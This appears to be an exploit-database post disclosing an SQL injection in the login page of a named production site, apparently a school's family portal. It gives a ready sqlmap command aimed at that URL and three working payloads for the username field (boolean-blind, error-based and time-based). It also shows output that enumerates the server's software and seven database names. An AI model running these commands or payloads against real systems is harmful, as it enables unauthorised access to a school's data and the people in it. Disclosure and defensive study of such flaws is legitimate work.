# Exploit Title: Athens School / Atenas Familia / Atenas Tech / Bitnami LAMP | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u "http://prod.atenas.tech/familia/login.php" --form --dbs --batch --------------------------------------------------------------------------------------------------- .tech is the internet's new generic top-level domain for IT professionals, web developers, software engineers, project managers, and UX designers. Athens School Atenas Familia Atenas Tech Bitnami LAMP http://prod.atenas.tech/familia/login.php --- Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=ykfU' RLIKE (SELECT (CASE WHEN (4900=4900) THEN 0x796b6655 ELSE 0x28 END)) AND 'taTA'='taTA&password=&saveidentity=on Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: username=ykfU' AND GTID_SUBSET(CONCAT(0x716b6b7a71,(SELECT (ELT(3198=3198,1))),0x716a7a6b71),3198) AND 'AbeW'='AbeW&password=&saveidentity=on Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=ykfU' AND (SELECT 9806 FROM (SELECT(SLEEP(5)))jyyH) AND 'sqlu'='sqlu&password=&saveidentity=on --- the back-end DBMS is MySQL web application technology: Apache 2.4.46, PHP 7.4.14 the back-end DBMS: MySQL >= 5.6 banner: '8.0.18-google' available databases [7]: [+] atenas_colegio [+] demo [+] information_schema [+] mysql [+] performance_schema [+] stage [+] sys